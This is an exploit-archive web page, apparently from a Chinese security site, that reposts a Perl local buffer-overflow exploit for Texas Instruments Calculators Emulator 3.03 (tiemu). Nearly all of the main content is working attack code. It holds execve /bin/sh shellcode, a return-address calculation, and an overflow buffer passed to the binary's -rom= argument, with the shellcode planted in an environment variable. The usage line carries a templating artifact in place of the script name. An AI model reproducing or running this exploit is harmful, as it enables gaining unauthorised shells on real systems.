首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Texas Instruments Calculators Emulator 3.03 Buffer Overflow
来源:n_a at tutanota.com 作者:N_A 发布时间:2016-04-27  
#!/usr/bin/perl

#################################################################
#This exploit uses command line arguments for different offsets # 
#So it can be tested on different systems *NIX Flavours         #                        
#################################################################


##########################################################################
#Texas Instruments Emulator exploit                                      #
#Version: 3.03-nogdb+dfsg-3                                              #  
#                                                                        #
#As discussed here previously: https://www.exploit-db.com/exploits/39692/#
#And here https://packetstormsecurity.com/files/136679/Texas-Instruments #
#-Calculators-Emulator-3.03-nogdb-dfsg-3-Buffer-Overflow.html            #
#                                                                        #
#               EMAIL ->  n_a at tutanota.com                            #
#                                                                        #
##########################################################################

$filename = "usr/bin/tiemu"; #path name of the binary
$shellcode = 
"\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\xb0\x0b\xcd\x80";

#Calculating the return address of our shellcode
$ret = 0xbffffffa - length($shellcode) - length($filename);

#Try different offsets
$offs = $ARGV[0];


print "\n***Local Exploit for Texas Instruments Emulator***\n";
print "\t\tBy N_A\n\n";
print "Use: ___FCKpd___0 Offset\n\n";
sleep 1;
printf("Ret Shellcode 0x%x\n",$ret + $offs);



$adr = pack('l', ($ret + $offs));
$buff = 'A' x 96;
$buff .= $adr x 6;

#Set buffer in local var
local($ENV{'NNN'}) = $shellcode;

exec("$filename -rom= $buff");

#eof


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Yasr Screen Reader 0.6.9 - Loc
·RATS 2.3 Crash Proof Of Concep
·HP Data Protector 6.10 / 6.11
·Struts2 S2-032 checking tools
·Rough Auditing Tool for Securi
·Multiple Vendors (RomPager <=
·PCMan FTP Server 2.0.7 - RENAM
·Windows - CSRSS BaseSrvCheckVD
·Gemtek CPE7000 - WLTCS-106 sys
·Rough Auditing Tool for Securi
·Gemtek CPE7000 - WLTCS-106 Adm
·Acunetix WVS 10 - Remote Comma
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved